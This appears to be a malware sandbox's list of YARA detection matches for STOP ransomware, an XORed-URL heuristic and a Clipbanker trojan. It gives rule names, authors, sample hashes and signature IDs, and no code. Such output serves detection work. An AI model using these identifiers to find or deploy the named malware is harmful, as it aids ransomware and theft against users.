Source: 4.2.U59WtZz2Sg.exe.22815a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.2.build3.exe.b90000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 11.2.build3.exe.b90000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 9.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
